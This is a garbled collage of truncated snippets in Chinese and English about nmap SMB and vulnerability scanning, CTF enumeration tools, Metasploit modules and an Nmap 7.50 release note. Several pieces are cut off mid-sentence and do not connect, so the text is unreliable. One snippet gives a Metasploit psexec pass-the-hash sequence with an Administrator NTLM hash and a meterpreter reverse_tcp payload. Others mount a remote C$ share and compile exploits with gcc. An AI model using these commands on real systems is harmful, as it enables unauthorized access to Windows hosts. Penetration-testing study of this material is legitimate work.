1显示出了被扫描系统的猜测信息,可能的OS CPE(Operating System Common Platform Enumeration,详情点这里) 2显示了系统上运行的 SQL 数据库类型,版本,实例名称等信息。 nmap-ss-pn-a-example-3.png 1处为SQL服务的端口 2为用SMB协议的缺陷探测出的OS信息,一般来说这个比上面那个给出的准确一点。 3为路由跟踪信...
smb-os-discovery: This is ascriptfrom thedefaultcategory. It's an older script, so it may not return all information for Windows systems. It also discovers small and midsize business (SMB) servers, such as those using Samba. smb-enum-users: Find thisscriptin theauthcategory. It attempts ...
DNS enumeration is nerfed to ignore .com .co .eu .uk domains etc... since this tool was designed for CTF's like for instance, "hack the box". It will try to find most .htb domains if dns server's are detected.. This project use's various stand-alone & custom tools to enumerate...
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: msf> use exploit/windows/smb/psexec msf exploit(psexec)>setpayload windows/meterpreter/reverse_tcp msf exploit(psexec)>setSMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c msf e...
Windows enumeration AutoRecon.md CeWL.md LFI2RCE.md Nikto.md gobuster.md hydra.md nmap.md onetwopunch.md smb.md sqlmap.md subdomain.md wpscan.md others .gitignore README.mdBreadcrumbs MY_CHEAT_SHEET /enumeration / nmap.md Latest commit ...
Detecting other SMB vulnerabilities Retrieving the NetBIOS name and MAC address of a host How to do it... How it works... There's more... Enumerating user accounts of Windows hosts How to do it... How it works... There's more... Selecting LSA bruteforcing or SAMR enumeration exclusi...
大家可能会说在使用的时候我也不知道要使用那个script呀,这里给大家一个方便的参数来自动化判断使用哪些脚本 nmap --script=vuln 可以看到调用了多个smb的script,其中smb-vuln-ms17-010这个脚本扫描出了漏洞 Nmap 漏洞扫描就到此为止
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw 1. Kali 下编译 Exploit gcc -m32 -o output32 hello.c (32 位) gcc -m64 -o output hello.c (64 位) 1. 2. Kali 下编译 Windows Exploit wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/file...
auxiliary/scanner/smb/smb_version normal SMB Version Detection auxiliary/scanner/smtp/smtp_version normal SMTP Banner Grabber auxiliary/scanner/snmp/aix_version normal AIX SNMP Scanner Auxiliary Module auxiliary/scanner/ssh/ssh_version normal SSH Version Scanner ...
Network Mapper 近日发布了最新更新 Nmap 7.50 ,上一次的更新还需要追溯到2016年12月,而此次的版本上对于对于数百项功能进行了改进。 Nmap 7.50 的此次更新包括了Windows下的 Npcap 数据捕获驱动程序和库,而 WinPcap 则不再继续维护。 Npcap 是一组全新的API,不仅在性能上有所提升,还能保证与大多数流行操作系统(...